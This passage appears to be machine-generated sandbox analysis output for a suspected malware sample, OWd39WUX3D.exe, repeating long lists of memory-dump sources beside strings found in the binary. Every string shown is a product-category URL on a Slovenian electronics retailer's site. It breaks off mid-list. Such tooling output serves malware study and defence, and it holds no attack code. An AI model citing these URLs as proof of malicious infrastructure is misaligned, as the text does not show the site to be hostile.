OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-asfalte
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-krusno-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/tipala-za-meritve-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-storitve/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/nadzorne-enote-fiksni-detektorji-
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/hladilniki-za
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/ssr-rele-polp
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/tiristorski-r
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/dodatna-oprema-za-ind
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijske-tablice/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 